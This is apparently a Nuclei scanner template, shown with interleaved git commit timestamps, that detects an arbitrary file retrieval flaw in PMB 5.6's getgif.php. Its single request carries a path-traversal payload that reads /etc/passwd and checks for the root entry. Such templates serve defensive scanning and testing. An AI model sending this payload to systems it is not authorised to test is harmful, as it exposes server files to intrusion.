2021-03-12 17:12:45 +00:00
|
|
|
id: pmb-local-file-disclosure
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: PMB 5.6 - getgif.php Arbitrary File Retrieval
|
2021-03-12 17:12:45 +00:00
|
|
|
author: dhiyaneshDk
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/49054
|
2021-09-09 13:38:13 +00:00
|
|
|
tags: lfi,pmb
|
2021-03-12 17:12:45 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "root:x:0"
|